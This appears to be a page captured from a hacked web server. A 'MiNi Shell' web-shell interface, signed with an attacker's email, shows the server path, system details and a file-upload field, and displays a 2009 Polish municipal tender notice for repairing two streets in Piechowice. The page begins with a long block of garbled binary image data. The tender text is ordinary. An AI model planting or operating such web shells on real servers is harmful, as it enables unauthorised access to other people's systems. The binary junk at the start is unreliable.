JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090325/54615-N-2009.html

<p class="kh_header"><b>Piechowice: Remont ulicy Szklarskiej i ulicy Tysiąclecia w Piechowicach</b><br>
<b>Numer ogłoszenia: 54615 - 2009; data zamieszczenia: 25.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piechowice , ul. Żymierskiego 49, 58-573 Piechowice, woj. dolnośląskie, tel. 075 7548900, faks 075 7612274.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://piechowice.bip.pbox.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont ulicy Szklarskiej i ulicy Tysiąclecia w Piechowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zadanie pn. Remont ulicy Szklarskiej i ulicy Tysiąclecia w Piechowicach.
CPV 45 23 31 20-6      Roboty w zakresie budowy dróg
2.	Remont ulicy Szklarskiej obejmuje remont ulicy Szklarskiej wraz z parkingiem i chodnikiem w Piechowicach, a w szczególności:
-	remont z wymianą warstw konstrukcyjnych jezdni ul. Szklarskiej od skrzyżowania z ul. Żymierskiego do skrzyżowania z ul. Kolejową wraz 
z parkingiem i chodnikiem i drogą dojazdową do bud. 13   przy ul.   Szklarskiej,
-	wykonanie odwodnienia jezdni i parkingu (2 studnie chłonne)
Ulica Szklarska wraz z przyległym parkingiem i chodnikiem została całkowicie zniszczona w trakcie powodzi w sierpniu 2006 r. Obecnie ulica i parking posiadają nawierzchnię gruntową z nielicznymi pozostałościami nawierzchni bitumicznej oraz noszą ślady wielokrotnych napraw materiałem kamiennym. Chodnik - z płyt betonowych 35x35 cm. całkowicie zniszczony. Nawierzchnie nie posiadają żadnych urządzeń odwadniających, odwodnienie odbywa się powierzchniowo.
Parametry geometryczne ulicy wynoszą:
-	odcinek A - B - dł. 116 m, szer. 4,5 m
-	odcinek C - D - dł. 57 m, szer.,  3,0 m
Parametry geometryczne placu postojowego wynoszą:
-	pow. miejsc postojowych  - 292 m2
-	pow. jezdni manewrowej  - 477 m2
-	pow. chodników                - 145 m2
-	pow. zieleńców                 - 158 m2

Roboty obejmują:
-	roboty przygotowawcze (rozbiórki fragmentów istniejącej nawierzchni, rozbiórkę krawężnika, rozbiórkę fragmentów z kostki betonowej), regulację pionową studzienek dla urządzeń podziemnych, wywóz materiałów z rozbiórki,
-	roboty ziemne - korytowanie gł.                 - 40 cm.,
-	wykonanie warstw konstrukcyjnych:
	warstwa odsączająca                      - 10 cm.; 
	podbudowa z tłucznia kamiennego - 20 cm.
	warstwa klinująca z klińca 4-31         -5-4 cm.
	warstwa wiążąca z betonu asfaltowego 0/ 16 - 7 cm.
	warstwa ścieralna z betonu asfaltowego 0/ 12 - 5 cm.
-	ułożenie krawężnika betonowego 15x30x100 na ławie betonowej;
-	ustawienie obrzeży trawnikowych;
-	wykonanie chodnika z kostki brukowej betonowej Holland - 8 cm.;
-	odwodnienie terenu - studnie chłonne z kręgów betonowych o średnicy 1,2 studzienki ściekowe z kanałem rurowym PVC 160;
-	oznakowanie pionowe.
3. Remont ulicy Tysiąclecia obejmuje, remont jezdni i chodników ulicy Tysiąclecia  w Piechowicach, a w szczególności:
a.	remont chodników na odcinku od skrzyżowania z ul. Spacerową do  kładki dla pieszych nad rz. Kamienną
b.	remont nawierzchni jezdni ul. Tysiąclecia od skrzyżowania z ul. Szkolną do skrzyżowania z ul. Kamienną:
                   - warstwa wyrównawcza z betonu asfaltowego 0/12 w ilości 50kg/m2
                   - warstwa ścieralna gr. 5 cm z betonu asfaltowego
Ulica Tysiąclecia wraz z chodnikiem została zniszczona w trakcie powodzi w sierpniu 2006 r. Przewidziane do wykonania prace stanowią kontynuację robót z lat 2007-2008 (wykonano częściowo nawierzchnię chodników)..Objęta obecnym remontem  ulica posiadają spękaną ,zniszczoną nawierzchnię bitumiczną nosząca ślady wielokrotnych napraw (remontów cząstkowych), posiada liczne nierówności i wyboje. Chodnik - z płyt betonowych 35x35 cm całkowicie zniszczony. Brak części płyt betonowych. Chodniki z nawierzchnią bitumiczną również w złym stanie. Znaczne spękania i nierówności nawierzchni chodnika. Odwodnienie odbywa się za pomocą wpustów ulicznych..
Parametry geometryczne ulicy wynoszą:
a. odcinek A - B - dł. 253 m, 
c.	odcinek B - C - dł. 367 m, 
Szerokość jezdni zmienna od  4,80 - 8,50 m
Roboty obejmują:
-	roboty przygotowawcze (rozbiórki fragmentów istniejącej  
     nawierzchni, rozbiórkę krawężnika, rozbiórkę fragmentów   z kostki 
     betonowej), regulację pionową studzienek dla  urządzeń podziemnych, 
     wywóz materiałów z rozbiórki,
-    ułożenie krawężnika betonowego 15x30x100 na ławie  betonowej
-	ustawienie obrzeży trawnikowych
-	wykonanie chodnika z kostki brukowej beton Holland - 8  cm.
                -    wykonanie chodnika o nawierzchni z betonu asfaltowego  0/8 - gr.4 cm. 
                -    warstwa wyrównawcza z betonu asfaltowego  0/12 w ilości  50kg/m2.
                -    warstwa ścieralna z betonu asfaltowego 0/12 - 5 cm.
                -    oznakowanie pionowe
3. Szczegółowy opis przedmiotu zamówienia stanowią załączniki, stanowiące integralną część opisu przedmiotu zamówienia:
a) dokumentacja projektowa na remont ulicy Szklarskiej 
-	Specyfikacja techniczna wykonania i odbioru robót,
-	Dokumentacja projektowa pn. Remont ulicy Szklarskiej wraz z parkingiem i chodnikiem w Piechowicach,
-	Przedmiar robót
b) dokumentacja projektowa na remont ulicy Tysiąclecia 
-	Specyfikacja techniczna wykonania i odbioru robót,
-	Dokumentacja projektowa pn. Remont nawierzchni jezdni i chodników   ulicy Tysiąclecia w Piechowicach,
-	Przedmiar robót
4. Wymagany okres gwarancji:
na wykonane roboty ( materiały i robociznę) wynosi 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
5. W szczególności Wykonawca w ramach ceny oferty:
-	zapewni obsługę geodezyjną w zakresie niezbędnym do prawidłowego wykonania robót oraz ich odbioru w formie operatu kolaudacyjnego, pomiarów powykonawczych w zakresie uzgodnionym z Inspektorem nadzoru inwestorskiego (dokumentacja powykonawcza w 2 egz), 
-	zorganizuje i utrzyma plac budowy w czasie prowadzenia robót.
6.  Termin wykonania zamówienia:
Zamówienie należy zrealizować w terminie: 135 dni  licząc od dnia zawarcia  umowy.
7. Integralną częścią opisu przedmiotu zamówienia są obowiązki Wykonawcy wynikające z projektu umowy - załącznik nr 7 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.30.00-9, 45.23.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 135.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00 zł (słownie złotych: dziesięć tysięcy  złotych).
2.	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na rachunek bankowy Zamawiającego:
Bank Gospodarki Żywnościowej S.A.       Oddział w Jeleniej Górze   
               Nr 10 2030 0045 1110 0000 0082 2000
5.	W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał takiego dokumentu należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w  pok. 11 (Referat Finansowy I piętro lub dołączyć do oferty.
7.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału określone w art. 22 ust. 1 ustawy Pzp, tj:

1.1.	posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności  lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
1.2.	posiadają niezbędną wiedzę i doświadczenie zawodowe oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia tj.:
a)	wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia,    a jeżeli okres działalności jest krótszy to w tym okresie, min. 2 zadania o wartości brutto 350.000,00 zł każde zadanie w zakresie budowy, przebudowy, odbudowy lub remontu dróg o nawierzchni z asfaltobetonu oraz min. 2 dwa zadania o wartości brutto 100.000,00 zł, każde zadanie  w zakresie budowy, przebudowy, odbudowy, remontu  nawierzchni z kostki (np.) ; odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia - z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów  ( np. referencje) potwierdzających, że roboty te zostały wykonane należycie;
b)	dysponują lub będą dysponowali min. jedną osobą, która będzie uczestniczyć w wykonaniu zamówienia i która posiada kwalifikacje niezbędne do wykonania zamówienia tj. posiada uprawnienia do wykonywania samodzielnych funkcji kierownika budowy  robót drogowych i mogąca  wykazać się decyzją o przygotowaniu zawodowym do pełnienia samodzielnych funkcji technicznych w budownictwie oraz przynależnością do  właściwej Izby Samorządu Zawodowego. 
c)	dysponują lub będą dysponować sprzętem niezbędnym do wykonania zamówienia (w ilości minimum sztuk) tj.:
-	rozkładarka do nawierzchni z asfaltobetonu - szt. 1,
-	walec - szt. 2
-	samochód samowyładowczy - szt. 2
-	koparka- szt. 1.

1.3.  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
           zamówienia,           
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.


a także

1.5.	zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust. 1 pkt. 2, ust. 2 pkt. 1, 3, 3a, 5, 5a, 6  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału  w postępowaniu  o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz.U. Nr 87/2006, poz. 605 z póź. zm.) 
1.6.	oświadczą, że spełniają warunki określone w art. 22 ust. 1 PZP oraz, że nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP,
2. Sprawdzenie spełnienia w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 - Wykonawca składa oświadczenia, których wzór stanowią Załącznik Nr 2 oraz Załącznik Nr 3 do SIWZ.

1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust.1 ustawy do oferty dołączyć należy:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

2.	W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia do oferty dołączyć należy:

1) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęciem postępowania o udzielenie zamówienia, tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości , daty i miejsca wykonania oraz załączeniem dokumentów od poprzednich Zamawiających potwierdzających, że roboty te zostały wykonane należycie (np.referencje, protokoły odbioru, itp.) Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 4  do SIWZ,
2)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności - wg. Załącznika nr 5 do SIWZ. 
3)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie powyżej, wykonawca wskazał osoby, którymi będzie dysponował, 
4)	dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają, wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
5)	wykaz niezbędnych do wykonania narzędzi i urządzeń, którymi dysponuje lub będzie dysponował  Wykonawca; wg. Załącznika nr 6 do SIWZ
6)	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa powyżej, wykonawca wskazał narzędzia  i urządzenia, którymi będzie dysponował..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://piechowice.bip.pbox.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piechowice, 58-573 Piechowice, ul.Żymierskiego 49.Opłata za 1 egz. SIWZ 21.07 zł (koszt druku)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 10:00, miejsce: Ofertę należy złożyć Zamawiającemu, tj. w Urzędzie Miasta Piechowice, 58-573 Piechowice ul. Żymierskiego 49, pokój nr  5 (I piętro), w terminie do dnia 15 kwietnia 2009 roku, godz. 10:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com